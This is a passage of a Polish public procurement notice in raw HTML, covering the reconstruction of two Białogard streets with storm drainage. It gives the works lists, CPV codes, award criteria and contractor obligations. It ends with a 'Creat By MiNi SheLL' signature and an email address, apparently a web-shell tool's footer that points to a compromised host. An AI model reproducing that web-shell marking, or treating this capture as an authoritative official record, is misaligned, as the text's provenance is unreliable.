Szczegółowy opis przedmiotu zamówienia zawierają: projekt budowlany, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót. Wykonawca zobowiązany jest do zatrudnienia na okres realizacji zamówienia na podstawie umowy o pracę osób wykonujących w zakresie realizacji zamówienia czynności:roboty ziemne koparką, mechaniczne profilowanie i zagęszczenie gruntu rodzimego,   ława betonowa z oporem, krawężnik betonowy uliczny, obrzeża betonowe,  warstwa odsączająca z pospółki pod chodnik, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod jezdnię, podbudowa zasadnicza z betonu asfaltowego, geosiatka na skropionej podbudowie,  warstwa wiążąca z asfaltobetonu żwirowo-grysowego, warstwa ścieralna,  nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, rozebranie nawierzchni bitumicznej, rozebranie podbudowy z kruszywa łamanego, wykopy pod rurociąg i studnie,  zasypanie piaskiem, warstwa odsączająca z pospółki, podbudowa z kruszywa łamanego, podbudowa z masy mineralno-bitumicznej, geosiatka, warstwa wiążąca asfaltobetonu, ścieralna, podłoże pod kanały z materiałów sypkich z zagęszczeniem,  rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, trójnik do połączenia wpustu.
W zakresie każdej części Wykonawca zobowiązany jest do: przedłożenia harmonogramu rzeczowo-finansowego do zatwierdzenia przez Zamawiającego, zorganizowania zaplecza robót oraz urządzenia i zabezpieczenia na własny koszt terenu budowy (koszty bieżącej eksploatacji sieci wodociągowej, elektrycznej, zapewnienie ogrzewania itp. podczas realizacji przedmiotu umowy będzie ponosić Wykonawca), sporządzenia przed rozpoczęciem robót budowlanych planu bezpieczeństwa i ochrony zdrowia, oznakowania i zabezpieczenia terenu robót, zapewnienia na terenie budowy oraz terenach przyległych należytego ładu i porządku, przestrzegania przepisów bhp, ochrony obiektów i sieci znajdujących się na terenie robót, zgłaszania inspektorowi nadzoru terminu zakończenia robót zanikających; jeżeli Wykonawca nie dopełni tego obowiązku jest zobowiązany odkryć roboty, a następnie przywrócić je do stanu poprzedniego na własny koszt, wykonania robót budowlanych zgodnie z projektem budowlanym, zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami, harmonogramem rzeczowo-finansowym przedłożonym Zamawiającemu oraz oddania przedmiotu umowy w terminie, utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz składowania urządzeń i materiałów w sposób nie powodujący kolizji, zapewnienia na własny koszt transportu odpadów do miejsc ich wykorzystania lub utylizacji, łącznie z kosztami utylizacji, stosowania się do zaleceń Zamawiającego w zakresie ewentualnych zmian dokumentacji i wprowadzania robót dodatkowych, zamiennych i zaniechanych, skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów, kart gwarancyjnych, schematów, instrukcji, w tym bhp i p.poż. przed zgłoszeniem robót do odbioru, wykonania dokumentacji powykonawczej, wykonania dodatkowych badań, pomiarów lub ekspertyz w porozumieniu z Zamawiającym w przypadku wątpliwości Zamawiającego, co do jakości robót lub stwierdzenia wad oraz poniesienie kosztów w przypadku wyników negatywnych, zapewnienie wykonania i kierowania robotami objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe, po zakończeniu robót budowlanych doprowadzenia stanu terenu przylegającego do terenu budowy do stanu pierwotnego, uporządkowania terenu budowy, oznakowania zgodnego ze stałą organizacją ruchu i przekazanie go Zamawiającemu, niezwłocznego informowania Zamawiającego o wystąpieniu zdarzeń lub okoliczności, które mogą utrudnić terminową realizację części lub całości przedmiotu umowy w terminie nie dłuższym niż 7 dni od daty wystąpienia zdarzenia, ponoszenia wyłącznej odpowiedzialności za wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>przebudowa ulicy Janusza Sidły w Białogardzie wraz z budową kanalizacji deszczowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 2  przebudowa ulicy Janusza Sidły w Białogardzie wraz z budową kanalizacji deszczowej - roboty drogowe i kanalizacyjne: roboty pomiarowe, zdjęcie ziemi roślinnej  wraz z transportem, roboty ziemne koparką wraz z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45111200-0, 45233200-1,
                    45231100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 3<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Roboty towarzyszące oraz tymczasowe, nie objęte dokumentacją projektową i przedmiarem robót, konieczne  do uwzględnienia przy ww. częściach: uporządkowanie terenu objętego zamówieniem, zabezpieczenie mediów (woda, energia elektryczna, itp.), wykonanie dokumentacji powykonawczej, oznakowanie i zabezpieczenie terenu, na którym wykonywane będą roboty budowlane, opracowanie projektu tymczasowej organizacji ruchu.
Szczegółowy opis przedmiotu zamówienia zawierają: projekt budowlany, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót. Wykonawca zobowiązany jest do zatrudnienia na okres realizacji zamówienia na podstawie umowy o pracę osób wykonujących w zakresie realizacji zamówienia czynności: zdjęcie ziemi roślinnej, roboty ziemne koparką, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.  W zakresie każdej części Wykonawca zobowiązany jest do: przedłożenia harmonogramu rzeczowo-finansowego do zatwierdzenia przez Zamawiającego, zorganizowania zaplecza robót oraz urządzenia i zabezpieczenia na własny koszt terenu budowy (koszty bieżącej eksploatacji sieci wodociągowej, elektrycznej, zapewnienie ogrzewania itp. podczas realizacji przedmiotu umowy będzie ponosić Wykonawca), sporządzenia przed rozpoczęciem robót budowlanych planu bezpieczeństwa i ochrony zdrowia, oznakowania i zabezpieczenia terenu robót, zapewnienia na terenie budowy oraz terenach przyległych należytego ładu i porządku, przestrzegania przepisów bhp, ochrony obiektów i sieci znajdujących się na terenie robót, zgłaszania inspektorowi nadzoru terminu zakończenia robót zanikających; jeżeli Wykonawca nie dopełni tego obowiązku jest zobowiązany odkryć roboty, a następnie przywrócić je do stanu poprzedniego na własny koszt, wykonania robót budowlanych zgodnie z projektem budowlanym, zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami, harmonogramem rzeczowo-finansowym przedłożonym Zamawiającemu oraz oddania przedmiotu umowy w terminie, utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz składowania urządzeń i materiałów w sposób nie powodujący kolizji, zapewnienia na własny koszt transportu odpadów do miejsc ich wykorzystania lub utylizacji, łącznie z kosztami utylizacji, stosowania się do zaleceń Zamawiającego w zakresie ewentualnych zmian dokumentacji i wprowadzania robót dodatkowych, zamiennych i zaniechanych, skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów, kart gwarancyjnych, schematów, instrukcji, w tym bhp i p.poż. przed zgłoszeniem robót do odbioru, wykonania dokumentacji powykonawczej, wykonania dodatkowych badań, pomiarów lub ekspertyz w porozumieniu z Zamawiającym w przypadku wątpliwości Zamawiającego, co do jakości robót lub stwierdzenia wad oraz poniesienie kosztów w przypadku wyników negatywnych, zapewnienie wykonania i kierowania robotami objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe, po zakończeniu robót budowlanych doprowadzenia stanu terenu przylegającego do terenu budowy do stanu pierwotnego, uporządkowania terenu budowy, oznakowania zgodnego ze stałą organizacją ruchu i przekazanie go Zamawiającemu, niezwłocznego informowania Zamawiającego o wystąpieniu zdarzeń lub okoliczności, które mogą utrudnić terminową realizację części lub całości przedmiotu umowy w terminie nie dłuższym niż 7 dni od daty wystąpienia zdarzenia, ponoszenia wyłącznej odpowiedzialności za wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości.      
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>przebudowa ulicy Haliny Konopackiej w Białogardzie wraz z budową kanalizacji deszczowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 3: przebudowa ulicy Haliny Konopackiej w Białogardzie wraz z budową kanalizacji deszczowej - roboty drogowe i kanalizacyjne: roboty pomiarowe, roboty ziemne koparką z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45111200-0, 45233200-1,
                    45231100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 3<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Roboty towarzyszące oraz tymczasowe, nie objęte dokumentacją projektową i przedmiarem robót, konieczne  do uwzględnienia przy ww. częściach: uporządkowanie terenu objętego zamówieniem, zabezpieczenie mediów (woda, energia elektryczna, itp.), wykonanie dokumentacji powykonawczej, oznakowanie i zabezpieczenie terenu, na którym wykonywane będą roboty budowlane, opracowanie projektu tymczasowej organizacji ruchu.
Szczegółowy opis przedmiotu zamówienia zawierają: projekt budowlany, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót. Wykonawca zobowiązany jest do zatrudnienia na okres realizacji zamówienia na podstawie umowy o pracę osób wykonujących w zakresie realizacji zamówienia czynności: roboty ziemne koparką wraz z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, wykopy pod rurociąg i studnie,  zasypanie piaskiem, podłoża pod kanały z materiałów sypkich, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego,  wykonanie wylotu betonowego. W zakresie każdej części Wykonawca zobowiązany jest do: przedłożenia harmonogramu rzeczowo-finansowego do zatwierdzenia przez Zamawiającego, zorganizowania zaplecza robót oraz urządzenia i zabezpieczenia na własny koszt terenu budowy (koszty bieżącej eksploatacji sieci wodociągowej, elektrycznej, zapewnienie ogrzewania itp. podczas realizacji przedmiotu umowy będzie ponosić Wykonawca), sporządzenia przed rozpoczęciem robót budowlanych planu bezpieczeństwa i ochrony zdrowia, oznakowania i zabezpieczenia terenu robót, zapewnienia na terenie budowy oraz terenach przyległych należytego ładu i porządku, przestrzegania przepisów bhp, ochrony obiektów i sieci znajdujących się na terenie robót, zgłaszania inspektorowi nadzoru terminu zakończenia robót zanikających; jeżeli Wykonawca nie dopełni tego obowiązku jest zobowiązany odkryć roboty, a następnie przywrócić je do stanu poprzedniego na własny koszt, wykonania robót budowlanych zgodnie z projektem budowlanym, zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami, harmonogramem rzeczowo-finansowym przedłożonym Zamawiającemu oraz oddania przedmiotu umowy w terminie, utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz składowania urządzeń i materiałów w sposób nie powodujący kolizji, zapewnienia na własny koszt transportu odpadów do miejsc ich wykorzystania lub utylizacji, łącznie z kosztami utylizacji, stosowania się do zaleceń Zamawiającego w zakresie ewentualnych zmian dokumentacji i wprowadzania robót dodatkowych, zamiennych i zaniechanych, skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów, kart gwarancyjnych, schematów, instrukcji, w tym bhp i p.poż. przed zgłoszeniem robót do odbioru, wykonania dokumentacji powykonawczej, wykonania dodatkowych badań, pomiarów lub ekspertyz w porozumieniu z Zamawiającym w przypadku wątpliwości Zamawiającego, co do jakości robót lub stwierdzenia wad oraz poniesienie kosztów w przypadku wyników negatywnych, zapewnienie wykonania i kierowania robotami objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe, po zakończeniu robót budowlanych doprowadzenia stanu terenu przylegającego do terenu budowy do stanu pierwotnego, uporządkowania terenu budowy, oznakowania zgodnego ze stałą organizacją ruchu i przekazanie go Zamawiającemu, niezwłocznego informowania Zamawiającego o wystąpieniu zdarzeń lub okoliczności, które mogą utrudnić terminową realizację części lub całości przedmiotu umowy w terminie nie dłuższym niż 7 dni od daty wystąpienia zdarzenia, ponoszenia wyłącznej odpowiedzialności za wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com